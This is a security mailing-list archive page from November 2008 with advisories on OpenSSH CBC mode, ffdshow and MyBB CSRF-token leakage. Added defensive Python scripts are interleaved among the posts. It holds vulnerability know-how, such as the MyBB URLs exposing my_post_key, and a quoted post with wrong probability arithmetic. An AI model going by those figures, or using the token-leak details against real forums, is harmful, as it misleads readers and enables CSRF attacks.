Re: Re: OpenSSH security advisory: cbc.adv

2008-11-25 Thread dennis jackson
What documents have you been reading?

Take a look at the actual vulnerability advisory.
http://www.cpni.gov.uk/Docs/Vulnerability_Advisory_SSH.txt
Or the original posting by OpenSSH
http://www.securityfocus.com/archive/1/498558/30/0/threaded

Where is there any condition related to National Security?

If you read the vulnerability advisory you would see that the problem is a
design flaw in the SSH specification. OpenSSH was merely used as an example of
an implementation of SSH written to implement the specification.

It only takes a few seconds to realise that SSH is used in critical systems. We
have seen in recent weeks and months that we are all vulnerable to the security
of the banking systems. Anyone who uses online banking makes use of systems that
include SSH. Do the oil companies have a private network for ordering stocks?
What about weather stations or tidal gauges, are they on private networks? Are
there any ISPs who don't use remote management?


on 24/11/08 8:04 PM, [EMAIL PROTECTED] wrote:

 Hey!

 They put a condition because of National Security. Should that mean
 that they use OpenSSH in National Security-sensitive applications
 (interesting ;););))?

 If so, should that mean that they implicitly recognize the very good
 work done by the community?

 If so, why not act politely with the community and share knowledge?

 This would make the software better, so that they could still use it in
 their applications.

 How can't they understand that?

 Why not just share the knowledge and just ask for some time (fixed
 amount? or just when a solution will be found) before public release
 of the details of the attacks?

 Why not release the details and switch to another system if OpenSSH is
 not what they need anymore?

 So one more entity that just wants to benefit from FOSS, but not
 contribute...

 If I were the developers, then I would just retaliate (humorously)
 by sending them a similar (fake)-contract/NDA, asking them not to use
 OpenSSH, but share National Sensitive information. In other words, just
 ask them to share THEIR knowledge without US providing our tools.

 There are some times where I hate the BSD licence, because it does not
 force people to cooperate! (even if I don't think any other licence
 would help here...)

 My 2 cents and sorry for the off-topic subject...

 Cheers

 GM

 --
 Guillaume MULLER
 Post-Doc - Sala C2-50
 Laboratório de Técnicas Inteligentes (LTI)
 Depto. Eng. Computação e Sistemas Digitais (PCS)
 Escola Politécnica da Universidade de São Paulo
 Av. Prof. Luciano Gualberto, 158 travessa 3
 05508-900 - São Paulo - SP - Brasil
 Tel: +55 11 3091 5397
 http://www.lti.pcs.usp.br/~guillaume


Re: OpenSSH security advisory: cbc.adv

2008-11-25 Thread Nick Boyce
On Mon, Nov 24, 2008 at 11:39 PM, Damien Miller [EMAIL PROTECTED] wrote:

 On Mon, 24 Nov 2008, Nick Boyce wrote:

 Could someone please help the uncomprehending [i.e. me :-)] understand
 why or whether this is anything to be worried about at all ?

 Yes, the attack is very unlikely to work against an interactive
 connection.

  The usage pattern where the attack is most likely to succeed is where an
  automated connection is configured to retry indefinitely in the event of
  errors. In this case, it might be possible to recover as much as 14 bits
  of plaintext per hour
[...]
 Given the amount of data pumped down the typical automated connection
 per hour, this is hardly anything to worry about .. surely ?

 That depends on the data that is being transferred. If it includes
 sensitive information, then this leakage rate might be unacceptable.
[...]
 We provide this information so you can decide whether this attack
 is likely to succeed in your environment.

Thanks - I appreciate your post and clarification.
To be clear, I wasn't seeking to dispute your original post in any way
- rather I figured many of us non-cryptographers would like to be
*very* sure exactly what the exposure is, given that a weakness in SSH
protocol is often the cause of much fear, many missed meals and
remedial steps taken hurriedly :)

The original CPNI bulletin is less than helpful in stating :
   The severity is considered to be potentially HIGH due to the
   32 bits of plaintext that can be recovered.
leaving me wondering how to reconcile severity HIGH with 32 bits of
plaintext can be recovered.

Ignoring the attack success probability, I glean from your explanation
that there is only really a problem if, say, the SSH connection
transfers a simple 1, 2, 3 or 4 byte value which reveals a secret.

 at present we do not feel that this issue is serious enough to make an 
 emergency release

Maybe this was always clear, but along with that reassurance I guess
you would recommend we all take your stated remedial action :
   [place] the following directive in sshd_config and ssh_config:
   Ciphers aes128-ctr,aes256-ctr,arcfour256,arcfour,aes128-cbc,aes256-cbc
at the very next maintenance opportunity, on the grounds that it can't
hurt, and can only help ?

For instance, (and my apologies for not having looked in any detail at
possible compatibility issues), would it be fair to say the popular
PuTTY-client-with-OpenSSH-server scenario would be fine after the
above config change ?

Cheers
Nick Boyce
-- 
Science is the poetry of reality -- Richard Dawkins
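The Ciphers directive quoted above raises a question that is easy to check mechanically rather than by eye: which modes does a given sshd_config or ssh_config actually prefer? The following script is an added example, not part of this thread and not OpenSSH code. It parses the first Ciphers directive (OpenSSH honours the first occurrence of a keyword and ignores later ones) and reports whether a CBC-mode cipher is listed ahead of every CTR-mode cipher. The two config snippets it checks are constructed for the example; the recommended cipher line is the one quoted in the thread.

```python
"""Report the cipher preference order declared in an OpenSSH config file.

Added example (not OpenSSH code). Works for both sshd_config and ssh_config:
the keyword is the same on both sides, and in the negotiation the server picks
the first cipher on the client's list that it also supports, so the order on
either side matters.
"""
import re

# The directive quoted in the thread above.
RECOMMENDED_CIPHERS = "aes128-ctr,aes256-ctr,arcfour256,arcfour,aes128-cbc,aes256-cbc"

# Constructed sample configs for the example.
RECOMMENDED_CONFIG = f"""
# sshd_config (constructed sample)
Port 22
Ciphers {RECOMMENDED_CIPHERS}
"""

CBC_FIRST_CONFIG = """
# constructed sample that still prefers CBC; the later Ciphers line is ignored
Port 22
Ciphers aes128-cbc,3des-cbc,aes128-ctr
Ciphers aes128-ctr
"""

# 'Keyword value' and 'Keyword=value' are both accepted by OpenSSH.
DIRECTIVE_RE = re.compile(r"^ciphers(?:\s+|\s*=\s*)(\S+)$", re.IGNORECASE)


def parse_ciphers(config_text):
    """Return the cipher list of the first Ciphers directive, or None if there is none.

    OpenSSH parsing rules applied here: '#' starts a comment, keywords are
    case-insensitive, and the first occurrence of a keyword wins.
    """
    for raw in config_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        match = DIRECTIVE_RE.match(line)
        if match:
            return [c.strip().lower() for c in match.group(1).split(",") if c.strip()]
    return None


def mode_of(cipher):
    """Classify a cipher name by its mode suffix; arcfour has no block mode."""
    if cipher.endswith("-cbc"):
        return "cbc"
    if cipher.endswith("-ctr"):
        return "ctr"
    return "other"


def assess(config_text):
    """Summarise how a config orders CBC relative to CTR ciphers."""
    ciphers = parse_ciphers(config_text)
    if ciphers is None:
        # No directive: the build's compiled-in default order applies, which this
        # script cannot see, so it only reports that fact.
        return {"ciphers": None, "cbc_preferred": None, "cbc_offered": []}
    modes = [mode_of(c) for c in ciphers]
    first_cbc = modes.index("cbc") if "cbc" in modes else None
    first_ctr = modes.index("ctr") if "ctr" in modes else None
    # CBC is preferred if it is listed and either no CTR cipher is listed at all
    # or the first CBC entry precedes the first CTR entry.
    cbc_preferred = first_cbc is not None and (first_ctr is None or first_cbc < first_ctr)
    return {
        "ciphers": ciphers,
        "cbc_preferred": cbc_preferred,
        "cbc_offered": [c for c in ciphers if mode_of(c) == "cbc"],
    }


if __name__ == "__main__":
    for name, text in (("recommended", RECOMMENDED_CONFIG), ("cbc-first", CBC_FIRST_CONFIG)):
        print(name, assess(text))
```

A result with `cbc_preferred` False but a non-empty `cbc_offered` list is exactly what the quoted directive produces: CTR is negotiated whenever the peer supports it, and CBC remains available only for peers that offer nothing else, which is the compatibility trade-off the thread is discussing.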


Re: OpenSSH security advisory: cbc.adv

2008-11-25 Thread Damien Miller
On Mon, 24 Nov 2008, Nick Boyce wrote:

 [ahem] ... Sorry to be dumb, but ...
 
 On Fri, Nov 21, 2008 at 10:19 AM, Damien Miller [EMAIL PROTECTED] wrote:
 
  Based on the description contained in the CPNI report and a slightly
  more detailed description forwarded by CERT this issue appears to be
  substantially similar to a known weakness in the SSH binary packet
  protocol first described in 2002 by Bellare, Kohno and Namprempre[2].
  The new component seems to be an attack that can recover 14 bits of
  plaintext with a success probability of 2^-14
 
 Could someone please help the uncomprehending [i.e. me :-)] understand
 why or whether this is anything to be worried about at all ?
 
 Quick calculator session :
 2^(-18) = 0.03814697265625
 2^(-14) = 0.6103515625
 
 So there is a vanishingly small probability that a Bad Guy may
 discover less than 2 characters from my command-line, every time they
 try this attack.  And each time they fail, my connection gets rudely
 chopped.  Two characters won't help them much.  They'd need to succeed
 about ten times per typed command-line to snoop on most of my
 sessions.  This weakness is surely of no conceivable use to a Bad Guy
 ?

Yes, the attack is very unlikely to work against an interactive
connection.

  The usage pattern where the attack is most likely to succeed is where an
  automated connection is configured to retry indefinitely in the event of
  errors. In this case, it might be possible to recover as much as 14 bits
  of plaintext per hour (assuming a very fast 10 connections per second).
  Implementing a limit on the number of connection retries (e.g. 256) is
  sufficient to render the attack infeasible for this case.
 
 Given the amount of data pumped down the typical automated connection
 per hour, this is hardly anything to worry about .. surely ?

That depends on the data that is being transferred. If it includes
sensitive information, then this leakage rate might be unacceptable.
On the other hand, I expect that most people aren't running automated
transfers that will retry enough for the attack to become feasible.

We provide this information so you can decide whether this attack
is likely to succeed in your environment.

-d
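To put the figures in Damien's reply into numbers (an added example, not part of the thread and not OpenSSH code): if each attempt succeeds independently with probability p and every failure costs the connection, then with a cap of N reconnects the attacker's overall chance is 1 - (1-p)^N. The script below models that with the two per-attempt probabilities quoted in the thread, 2^-14 for the 14-bit case and 2^-18 for the 32-bit CPNI figure, and with the 10 connections per second rate Damien assumes; the independence assumption and the arithmetic are mine.

```python
"""Model the cost of a retry-driven attack with per-attempt success probability p.

Added example, not part of the OpenSSH advisory. Assumptions: every attempt is
independent, succeeds with probability p, and each failure costs one connection
(the peer drops it), so the attacker depends on the victim reconnecting.
"""
import math

P_14BIT = 2.0 ** -14  # per-attempt success probability quoted in the advisory
P_32BIT = 2.0 ** -18  # per-attempt probability for the 32-bit CPNI figure


def p_success_within(p, retries):
    """Probability of at least one success in `retries` independent attempts."""
    if retries <= 0:
        return 0.0
    return 1.0 - (1.0 - p) ** retries


def expected_attempts(p):
    """Mean number of attempts until the first success (geometric distribution)."""
    return 1.0 / p


def retries_for_confidence(p, confidence):
    """Smallest retry count giving at least `confidence` chance of one success."""
    if not 0.0 < confidence < 1.0:
        raise ValueError("confidence must be strictly between 0 and 1")
    return math.ceil(math.log(1.0 - confidence) / math.log(1.0 - p))


def summarise(p, bits, retry_cap, connections_per_second):
    """Compare an unlimited retry loop with one limited to `retry_cap` attempts."""
    attempts_per_hour = 3600 * connections_per_second
    return {
        "bits_per_success": bits,
        "expected_attempts": expected_attempts(p),
        "attempts_per_hour": attempts_per_hour,
        # unlimited retries: chance of at least one success in one hour
        "p_within_hour_uncapped": p_success_within(p, attempts_per_hour),
        # capped retries: the whole attack gets at most retry_cap attempts
        "p_within_cap": p_success_within(p, retry_cap),
        "retries_for_50pct": retries_for_confidence(p, 0.5),
    }


if __name__ == "__main__":
    for label, p, bits in (("14-bit case", P_14BIT, 14), ("32-bit CPNI figure", P_32BIT, 32)):
        print(label, summarise(p, bits, retry_cap=256, connections_per_second=10))
```

With unlimited reconnects at 10 per second the 14-bit case has roughly an 89% chance of one success within an hour, which is the regime Damien's "as much as 14 bits per hour" describes; with a cap of 256 reconnects the same attack gets about a 1.5% chance in total, and needs well over ten thousand attempts to reach even odds.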



CanSecWest 2009 CFP (March 18-20 2009, Deadline December 8 2008)

2008-11-25 Thread Dragos Ruiu
Call For Papers

    The CanSecWest 2009 CFP is now open.

    Deadline is December 8th, 2008.

CanSecWest CALL FOR PAPERS

    VANCOUVER, Canada -- The tenth annual CanSecWest applied
    technical security conference - where the eminent figures
    in the international security industry will get together
    to share best practices and technology - will be held in
    downtown Vancouver at the Sheraton Wall Centre on
    March 18-20, 2009. The most significant new discoveries
    about computer network hack attacks and defenses,
    commercial security solutions, and pragmatic real world
    security experience will be presented in a series of
    informative tutorials.

    The CanSecWest meeting provides international researchers
    a relaxed, comfortable environment to learn from
    informative tutorials on key developments in security
    technology, and collaborate and socialize with their peers
    in one of the world's most scenic cities - a short drive
    away from one of North America's top skiing areas.

    The CanSecWest conference will also feature the
    availability of the Security Masters Dojo expert network
    security sensei instructors, and their advanced, and
    intermediate, hands-on training courses - featuring small
    class sizes and practical application exercises to
    maximize information transfer.

    We would like to announce the opportunity to submit
    papers, and/or lightning talk proposals for selection by
    the CanSecWest technical review committee. This year we
    will be doing one hour talks, and some shorter talk
    sessions.

    Please make your paper proposal submissions before
    December 8th, 2008.

    Some invited papers have been confirmed, but a limited
    number of speaking slots are still available. The
    conference is responsible for travel and accommodations for
    the speakers. If you have a proposal for a tutorial
    session then please email a synopsis of the material and
    your biography, papers, and speaking background to
    secwest09 [at] cansecwest.com . Only slides will be needed
    for the March paper deadline, full text does not have to
    be submitted - but will be accepted if available. This
    year we will be opening up the presentation guidelines to
    include talks not in English (particularly Chinese) which
    we will offer to translate for the speaker if they are not
    a native English speaker.

    The CanSecWest 2009 conference consists of tutorials on
    technical details about current issues, innovative
    techniques and best practices in the information security
    realm. The audiences are a multi-national mix of
    professionals involved on a daily basis with security
    work: security product vendors, programmers, security
    officers, and network administrators. We give preference
    to technical details and new education for a technical
    audience.

    The conference itself is a single track series of
    presentations in a lecture theater environment. The
    presentations offer speakers the opportunity to showcase
    on-going research and collaborate with peers while
    educating and highlighting advancements in security
    products and techniques. The focus is on innovation,
    tutorials, and education instead of product pitches. Some
    commercial content is tolerated, but it needs to be backed
    up by a technical presenter - either giving a valuable
    tutorial and best practices instruction or detailing
    significant new technology in the products.

    Paper proposals should consist of the following
    information:
     1. Presenter, and geographical location (country of
        origin/passport) and contact info (e-mail, postal
        address, phone, fax).
     2. Employer and/or affiliations.
     3. Brief biography, list of publications and papers.
     4. Any significant presentation and educational
        experience/background.
     5. Topic synopsis, Proposed paper title, and a one
        paragraph description.
     6. Reason why this material is innovative or significant
        or an important tutorial.
     7. Optionally, any samples of prepared material or
        outlines ready.
     8. Will you have full text available or only slides?
     9. Language of preference for submission.
    10. Please list any other publications or conferences
        where this material has been or will be
        published/submitted.

    Please include the plain text version of this information
    in your email as well as any file, pdf, sxw, ppt, or html
    attachments.

    Please forward the above information to secwest09 [at]
    cansecwest.com to be considered for placement on the
    speaker roster, or have your lightning talk scheduled. If
    you contact anyone else at our organization please ensure
    you also cc the submission address with your proposal or
    it may be omitted from the review process.


cheers,
--dr

--
World Security Pros. Cutting Edge Training, 

Re: [SVRT-05-08] Critical BoF vulnerability found in ffdshow affecting all internet browsers (SVRT-Bkis)

2008-11-25 Thread Eygene Ryabinkin
Good day.

Mon, Nov 24, 2008 at 03:17:05PM +0700, svrt wrote:
 In Oct 2008, SVRT-Bkis has detected a serious buffer overflow vulnerability
 in ffdshow which affects all available internet browsers.
   ^^^
Really?  And links, elinks, lynx, dillo and others are affected too?
What about my Firefox that (I assume) has no ffdshow code inside it and
there are no ffdshow-related plugins coupled to it?  Is it vulnerable?

I really appreciate that you're searching for the issues and
releasing advisories -- thanks for doing this!  But, please, use the
appropriate wording, or your advisories will lead to controversial
feelings.

Sorry for being a bit bluffy :(
-- 
Eygene


Re: [SVRT-05-08] Critical BoF vulnerability found in ffdshow affecting all internet browsers (SVRT-Bkis)

2008-11-25 Thread Nam Nguyen
The report is for ffdshow, but the referred URL is to ffdshow-tryout. I wonder 
if they are the same.

Cheers
Nam

On Mon, 24 Nov 2008 15:17:05 +0700
svrt [EMAIL PROTECTED] wrote:

 1. General Information
 
 ffdshow is a DirectShow filter and VFW codec for many audio and video 
 formats, such as DivX, Xvid and H.264. It is the most popular audio and 
 video decoder on Windows. Besides a stand-alone setup package, ffdshow is 
 often included in almost all codec pack software such as K-lite Codec Pack, 
 XP Codec Pack, Vista Codec Package, Codec Pack All in one, etc.
 
 In Oct 2008, SVRT-Bkis has detected a serious buffer overflow vulnerability 
 in ffdshow which affects all available internet browsers. Taking advantage 
 of the flaw, hackers can perform remote attacks, inject viruses, steal 
 sensitive information and even take control of the victim's system.
 
 Since ffdshow is an open source software (can be found at 
 http://sourceforge.net/projects/ffdshow-tryout), we have contacted the 
 developing team and they have patched the vulnerability in the latest 
 version of ffdshow.
 
 Details : http://security.bkis.vn/?p=277
 SVRT Advisory  : SVRT-05-08
 Initial vendor notification :  13-11-2008
 Release Date : 24-11-2008
 Update Date  : 24-11-2008
 Discovered by : SVRT-Bkis
 Security Rating :  Critical
 Impact : Remote Code Execution
 Affected Software : ffdshow (rev2347 20081123)
 
 2. Technique Description
 
 The flaw occurs when ffdshow works with a media stream (e.g. 
 http://[website]/test.avi). On parsing an overly long link, ffdshow would 
 encounter a buffer overflow error as the memory is not allocated and 
 controlled well.
 
 ffdshow is in fact a codec component for decoding multimedia formats so it 
 must be used via some media player; the default program is Windows Media 
 Player (wmp). Due to this reason, all internet browsers that support wmp 
 plug-in are influenced by this vulnerability, such as Internet Explorer, 
 Firefox, Opera, Chrome...
 
 In order to exploit, hackers trick users into visiting a website containing 
 malicious code. If successful, malicious code would be executed without any 
 users' further interaction. Hackers can then take complete control of the 
 system.
 
 3. Solution
 
 As for the seriousness of the vulnerability, it has been patched in the 
 latest version of ffdshow by the developing team of the software. Bkis 
 Internetwork Security Center highly recommends that users should update 
 ffdshow to the latest version here: 
 http://sourceforge.net/project/showfiles.php?group_id=173941&package_id=199416&release_id=439904
 
 At the moment, there are a lot of software packages packing ffdshow that 
 haven't been updated. On account of this, users should also update the 
 ffdshow latest versions:
 - K-Lite Codec Pack (latest version).
 - XP Codec Pack (latest version).
 - Vista Codec Package (latest version).
 - Codec Pack All in one (latest version).
 - Storm Codec Pack (latest version).
 - And many other software Codec packages using ffdshow.
 
 In addition, software producers that make use of ffdshow in their products 
 should also update these products with the latest version of ffdshow.
 
 4. Credits
 Thanks Nguyen Anh Tai for working with SVRT-Bkis.
 
 
 Bach Khoa Internetwork Security Center (BKIS)
 Hanoi University of Technology (Vietnam)
 
 Email : [EMAIL PROTECTED]
 Website : www.bkav.com.vn
 WebBlog : security.bkis.vn
 Our PGP : http://security.bkis.vn/policy/pgp/SVRT-Bkis.gpg
  
 
 
 
 


-- 
Nam


Re: OpenSSH security advisory: cbc.adv

2008-11-25 Thread Fabian Hänsel
Nick Boyce [EMAIL PROTECTED] wrote:

 [ahem] ... Sorry to be dumb, but ...
 
 On Fri, Nov 21, 2008 at 10:19 AM, Damien Miller [EMAIL PROTECTED]
 wrote:
 
  Based on the description contained in the CPNI report and a slightly
  more detailed description forwarded by CERT this issue appears to be
  substantially similar to a known weakness in the SSH binary packet
  protocol first described in 2002 by Bellare, Kohno and Namprempre
  [2]. The new component seems to be an attack that can recover 14
  bits of plaintext with a success probability of 2^-14
 
 Could someone please help the uncomprehending [i.e. me :-)] understand
 why or whether this is anything to be worried about at all ?
 
 Quick calculator session :
 2^(-18) = 0.03814697265625
 2^(-14) = 0.6103515625
 
 So there is a vanishingly small probability that a Bad Guy may
 discover less than 2 characters from my command-line, every time they
 try this attack.  And each time they fail, my connection gets rudely
 chopped.  Two characters won't help them much.  They'd need to succeed
 about ten times per typed command-line to snoop on most of my
 sessions.  This weakness is surely of no conceivable use to a Bad Guy

You could still use this attack in DoS scenarios. Through those
connection terminations the service quality is reduced. You could e.g.
lock admins out (prevent security updates, have more time for
time-consuming attacks which would otherwise be reset from time to time
by admins, ...) or reduce the transmission rate of security logs by machines
without a hard disk using SSH like a VPN to send logs to some central
server, or in general could inhibit many vital processes based on SSH.
Thus you could increase your chances of other attacks. And of course
you can attack the service ssh itself.

(all those could be prevented by the use of a VPN - but most people
won't take this effort if they don't really need to do so and therefore
don't have one set up when they would need it)

Best regards
  Fabian


MyBB 1.4.3 my_post_key Disclosure Vulnerability

2008-11-25 Thread [EMAIL PROTECTED]

##
# MyBB 1.4.3 my_post_key Disclosure Vulnerability by NBBN (http://nbbnsblog.co.cc)
##

Vendor: http://mybboard.net
Date: November 25, 2008

These URLs contain my_post_key. Moderators and admins use these 
sometimes, depending on what they want to do with a thread.

my_post_key is used to perform various actions and to prevent CSRF.

These pages show the posts of the users. If some of these posts have 
pictures, the referrer will be transferred to the server of the images.

#Vuln URLs#
http://localhost/mybb/moderation.php?action=mergeposts&tid=1&modtype=thread&my_post_key=[key]
http://localhost/mybb/moderation.php?action=split&tid=1&modtype=thread&my_post_key=[key]
http://localhost/mybb/moderation.php?action=deleteposts&tid=1&modtype=thread&my_post_key=[key]
#

Finally, an attacker has the postkey, and can perform some interesting 
moderator or administrator actions with CSRF.
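The leak described above is the standard Referer problem: a CSRF token carried in a GET query string travels to every third-party host whose images the page embeds. One defender-side check is to look for it in web server logs. The script below is an added example, not MyBB code; it parses Apache combined-format lines and flags both requests whose own URL carries a token parameter (pages that would hand it to image hosts via Referer) and incoming requests whose Referer already carries one. The log lines are constructed for the example, the parameter name my_post_key is the one from the advisory, and the token value is only ever reported as a short prefix.

```python
"""Find CSRF tokens travelling in URLs or Referer headers in an Apache combined log.

Added example, not part of MyBB. my_post_key is the parameter from the
advisory; add other names to TOKEN_PARAMS for other applications.
"""
import re
from urllib.parse import urlsplit, parse_qs

TOKEN_PARAMS = {"my_post_key"}

# Apache "combined" log format: host ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Constructed sample lines: a moderator opening a moderation URL that carries the
# token, an image request whose Referer carries the token, a harmless hit, and a
# malformed line the parser must survive.
SAMPLE_LOG = """\
10.0.0.5 - - [25/Nov/2008:10:00:01 +0000] "GET /mybb/moderation.php?action=split&tid=1&modtype=thread&my_post_key=0123456789abcdef HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [25/Nov/2008:10:00:02 +0000] "GET /images/sig.png HTTP/1.1" 200 812 "http://forum.example/mybb/moderation.php?action=split&tid=1&modtype=thread&my_post_key=0123456789abcdef" "Mozilla/5.0"
10.0.0.7 - - [25/Nov/2008:10:00:03 +0000] "GET /mybb/showthread.php?tid=1 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
this line is not in combined format
"""


def tokens_in_url(url):
    """Return {param: value} for every TOKEN_PARAMS entry present in the URL's query string."""
    query = urlsplit(url).query
    found = {}
    for name, values in parse_qs(query, keep_blank_values=True).items():
        if name in TOKEN_PARAMS and values:
            found[name] = values[0]
    return found


def preview(token):
    """Never report the full secret; a 4-character prefix is enough to correlate."""
    return token[:4] + "..."


def scan_log(text):
    """Return flagged lines and a count of lines that did not parse."""
    findings, skipped = [], 0
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip():
            continue
        m = LOG_RE.match(line)
        if not m:
            skipped += 1
            continue
        # Check the request's own URL and, separately, the Referer it arrived with.
        for where, url in (("request", m.group("url")), ("referer", m.group("referer"))):
            if url == "-":
                continue
            for name, value in tokens_in_url(url).items():
                findings.append({
                    "line": lineno, "where": where, "param": name,
                    "host": m.group("host"), "token_preview": preview(value),
                })
    return {"findings": findings, "skipped": skipped}


if __name__ == "__main__":
    result = scan_log(SAMPLE_LOG)
    for finding in result["findings"]:
        print(finding)
    print("unparsed lines:", result["skipped"])
```

A "request" finding on the forum's own log identifies a page that carries the token in its URL and therefore leaks it to any embedded third-party resource; a "referer" finding on any server shows such a token arriving from elsewhere. The lasting fix is to keep the token out of GET URLs (submit moderation actions by POST) rather than to scrub logs.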




New tool and paper for Oracle forensics...

2008-11-25 Thread David Litchfield

Hey all,
I've just posted a new tool and paper for Oracle forensics. The tool, 
orablock, allows a forensic investigator to dump data from a cold Oracle 
data file - i.e. there's no need to load up the data file in the database 
which would cause the data file to be modified, so using orablock preserves 
the evidence. Orablock can also be used to locate stale data - i.e. data 
that has been deleted or updated. It can also be used to dump SCNs for data 
blocks which can be useful during the examination of a compromised Oracle 
box. Indeed, this is the subject of the paper Oracle Forensics Part 7: 
Using the Oracle System Change Number in Forensic Examinations. Both the 
tool (which compiles on Linux, Mac OS X and Windows) and the paper are 
available from http://www.databasesecurity.com/.

Cheers,
David Litchfield
NGSSoftware Ltd
http://www.ngssoftware.com/

--
E-MAIL DISCLAIMER

The information contained in this email and any subsequent
correspondence is private, is solely for the intended recipient(s) and
may contain confidential or privileged information. For those other than
the intended recipient(s), any disclosure, copying, distribution, or any
other action taken, or omitted to be taken, in reliance on such
information is prohibited and may be unlawful. If you are not the
intended recipient and have received this message in error, please
inform the sender and delete this mail and any attachments.

The views expressed in this email do not necessarily reflect NGS policy.
NGS accepts no liability or responsibility for any onward transmission
or use of emails and attachments having left the NGS domain.

NGS and NGSSoftware are trading names of Next Generation Security
Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1
4BF with Company Number 04225835 and VAT Number 783096402


Re: OpenSSH security advisory: cbc.adv

2008-11-25 Thread Bob Beck
 Maybe this was always clear, but along with that reassurance I guess
 you would recommend we all take your stated remedial action :
[place] the following directive in sshd_config and ssh_config:
Ciphers aes128-ctr,aes256-ctr,arcfour256,arcfour,aes128-cbc,aes256-cbc
 at the very next maintenance opportunity, on the grounds that it can't
 hurt, and can only help ?

It can possibly hurt very much - if ctr mode is subject to a
different vulnerability. There has been much discussion of ctr mode having
*possible* issues, although nothing I know of published directly about ssh. 

On the other hand, we have a national security agency who refuses
full disclosure, raising a vulnerability and pointing to a switch to
counter mode.  Perhaps this is to prevent the low likelihood but
possible attack they have found, or perhaps it is to encourage a hasty
switch to counter mode which is more convenient for national security
reasons. I don't honestly know - the only REAL info on the subject I've
seen has come from djm. 

You decide who you trust. Personally, I won't be making that change
hastily anywhere - Nothing I have is directly threatened by this
attack, so I can wait until someone figures out the gist of it and
implements an appropriate countermeasure, and I see some legitimate peer
review on the topic as opposed to FUD spreading. I frankly trust the
OpenSSH developers a lot more than I trust ssh.com or a puppet state
no such agency acting as worn out lapdog for the sorts of people
that implement things like the patriot act. People who will not share
information with the developers of the software should always be
suspect. They have no reason not to without a hidden agenda.

  -Bob





[security bulletin] HPSBTU02382 SSRT080132 rev.1 - HP Secure Web Server for Tru64 UNIX or Internet Express for Tru64 UNIX running PHP, Remote Denial of Service (DoS) or Arbitrary Code Execution

2008-11-25 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c01599836
Version: 1

HPSBTU02382 SSRT080132 rev.1 - HP Secure Web Server for Tru64 UNIX or Internet 
Express for Tru64 UNIX running PHP, Remote Denial of Service (DoS) or Arbitrary 
Code Execution

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2008-11-25
Last Updated: 2008-11-25

Potential Security Impact: Remote Denial of Service (DoS) or arbitrary code 
execution.

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified in PHP running on the HP 
Secure Web Server for Tru64 UNIX or Internet Express for Tru64 UNIX. The 
vulnerability could be exploited remotely to cause a Denial of Service (DoS) or 
to execute arbitrary code.

References: CVE-2008-3658

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Secure Web Server for Tru64 UNIX v 6.8.0 or earlier 
HP Internet Express for Tru64 UNIX v 6.8 
HP Internet Express for Tru64 UNIX v 6.7 
HP Internet Express for Tru64 UNIX v 6.6 

BACKGROUND

CVSS 2.0 Base Metrics 
===
Reference Base Vector   Base Score 
CVE-2008-3658 (AV:N/AC:L/Au:N/C:P/I:P/A:P)  7.5
===
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002.

RESOLUTION

HP is releasing the following Early Release Patch (ERP) kits publicly for use 
by any customer until updates are available in mainstream release patch kits. 

The resolutions contained in the ERP kits are targeted for availability in the 
following mainstream kit: 

HP Internet Express for Tru64 UNIX v 6.9

The ERP kits use dupatch to install and will not install over any Customer 
Specific Patches (CSPs) that have file intersections with the ERPs. Contact 
your service provider for assistance if the installation of the ERPs is blocked 
by any of your installed CSPs.

The ERP kit provides apache-tomcat-5.5.26, apache_1.3.39, httpd-2.2.6, 
php-4.4.9 sources and licenses.

HP Secure Web Server for Tru64 UNIX v 6.8.0 or earlier, HP Internet Express for 
Tru64 UNIX v 6.6, v 6.7, or v 6.8 
PREREQUISITE: HP Tru64 UNIX v 5.1B-4 PK6 (BL27) or v 5.1B-3 PK5 (BL26) 
Name: SWS-681.tar.gz 
Location: http://www.itrc.hp.com/service/patch/patchDetail.do?patchid=SWS-681

MD5 checksums are available from the ITRC patch database main page. From the 
patch database main page, click Tru64 UNIX, then click verifying MD5 checksums 
under useful links.

PRODUCT SPECIFIC INFORMATION 

HISTORY 

Version:1 (rev.1) - 25 November 2008 Initial release

Third Party Security Patches: Third party security patches that are to be 
installed on systems running HP software products should be applied in 
accordance with the customer's patch management policy. 

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported 
product, send Email to: [EMAIL PROTECTED] 
It is strongly recommended that security related information being communicated 
to HP be encrypted using PGP, especially exploit information. 
To get the security-alert PGP key, please send an e-mail message as follows:
  To: [EMAIL PROTECTED] 
  Subject: get key

Subscribe: To initiate a subscription to receive future HP Security Bulletins 
via Email: 
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC

On the web page: ITRC security bulletins and patch sign-up 
Under Step1: your ITRC security bulletins and patches 
  - check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems 
  - verify your operating system selections are checked and save.


To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php 
Log in on the web page: Subscriber's choice for Business: sign-in. 
On the web page: Subscriber's Choice: your profile summary - use Edit Profile 
to update appropriate sections.


To review previously published Security Bulletins visit: 
http://www.itrc.hp.com/service/cki/secBullArchive.do 


* The Software Product Category that this Security Bulletin relates to is 
represented by the 5th and 6th characters of the Bulletin number in the title: 

GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault
 


